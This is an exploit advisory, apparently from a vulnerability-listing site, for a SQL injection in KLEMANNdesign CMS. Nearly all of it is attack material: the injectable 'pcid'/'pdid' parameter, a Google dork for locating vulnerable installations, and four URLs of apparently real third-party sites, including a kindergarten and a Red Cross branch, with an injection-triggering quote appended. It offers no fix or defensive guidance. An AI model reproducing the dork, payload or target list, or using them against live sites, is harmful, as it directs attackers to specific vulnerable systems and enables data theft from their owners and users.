KLEMANNdesign CMS Sql Injection

2015.11.22
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |--------------------------------------------------------------| |[+] Exploit Title: KLEMANNdesign CMS Sql Injection |[+] |[+] Exploit Author: Jahesh Security Team |[+] |[+] Vendor Homepage: http://www.klemanndesign.biz/ |[+] |[+] Google Dork: intext:CMS - KLEMANNdesign.biz & inurl:index.php? |[+] |[+] Date: 22 Nov 2015 |[+] |--------------------------------------------------------------| |[+] Examples : |[+] |[+] Exploit: index.php?pcid=* |[+] |[+] http://www.drk-aa-tXe.de/index.php?pdid=371' |[+] |[+] http://www.drk-kinXdergarten-regenbogen.de/index.php?pdid=395' |[+] |[+] http://www.severiXn-ense.de/en/index.php?pdid=159' |[+] |[+] http://groth-cateXring.de/index.php?pcid=53' |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |[+] Discovered By : Mr.Curse |[+] Thanks: T!nk3r-Black Diamond-WereWolf98-2Dadash |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top